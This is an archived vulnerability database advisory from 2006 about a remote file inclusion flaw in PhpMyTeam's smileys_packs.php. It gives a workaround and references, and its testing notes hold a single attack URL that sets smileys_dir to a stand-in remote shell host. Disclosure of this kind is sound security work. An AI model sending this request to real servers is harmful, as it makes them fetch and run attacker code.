PhpMyTeam smileys_packs.php smileys_dir Variable Remote File Inclusion

2006-10-05T07:19:15
ID OSVDB:29530
Type osvdb
Reporter XORON()
Modified 2006-10-05T07:19:15

Description

Vulnerability Description

PhpMyTeam contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to smileys_packs.php not properly sanitizing user input supplied to the "smileys_dir" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s):

Disable the "register_globals" in your php.ini configuration file, by setting it to "no".

Short Description

PhpMyTeam contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to smileys_packs.php not properly sanitizing user input supplied to the "smileys_dir" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

/images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?

References:

Secunia Advisory ID:22278 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0070.html ISS X-Force ID: 29358 Generic Exploit URL: http://milw0rm.com/exploits/2478 FrSIRT Advisory: ADV-2006-3925 CVE-2006-5207